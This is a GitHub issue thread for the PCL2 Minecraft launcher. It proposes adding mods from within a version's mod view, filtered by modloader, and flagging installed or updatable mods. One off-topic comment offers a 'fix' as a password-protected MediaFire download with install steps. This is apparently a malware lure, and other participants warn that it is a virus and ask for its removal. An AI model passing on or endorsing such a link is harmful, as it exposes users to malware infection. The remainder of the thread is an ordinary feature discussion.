### ISSUE TITLE
改进“为版本新增mod”的功能，以及标记已安装mod

### ISSUE THREAD

**Issue by Tonywqs** [Hex-Dragon/PCL2#4659]
### 检查项

- [X] 我已在 [Issues 页面](https://github.com/Hex-Dragon/PCL2/issues?q=is%3Aissue+) 和 [常见&难检反馈及问题列表](https://github.com/Hex-Dragon/PCL2/discussions/1930) 中搜索，确认了这一提案未被提交过。
- [X] 我已查看 [功能投票页面](https://github.com/Hex-Dragon/PCL2/discussions/categories/%E5%8A%9F%E8%83%BD%E6%8A%95%E7%A5%A8/)，确认了这一提案未在投票列表中。
- [X] 我知晓还没做的新功能真的太多了，忙不过来，所以新功能提案几乎不会被处理，也不建议再提交新功能提案 qwq……

### 描述

1.把“下载mod”（或者“增加mod”)这个功能增加到单个版本的mod浏览界面中，进而识别单个版本的mod文件及其modloader版本，自动筛选出与整合包modloader版本相对应的mod进行添加
2.在“下载”或者上诉中“增加mod”界面浏览mod时，能够对当前选择的版本中已经安装的mod进行标记，在此基础上，已安装mod有更新时能够显示“可更新”标识。

### 原因

虽然是两个功能，但是彼此关联非常紧密，能够很大程度上提高浏览和添加mod的便利性

**Comment by JingHai-Lingyun** [comment]
@3gf8jv4dv use `重复` label if duplicate

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by WForst-Breeze** [comment]
请不要下载上方链接的内容！

**Comment by Tonywqs** [comment]
> @LTCatt @Light-Beacon 
> 
> Delete this comment above please.
> 不要下载这个文件！

感谢提醒

**Comment by Tonywqs** [comment]
> 请不要下载上方链接的内容！这是病毒

感谢提醒
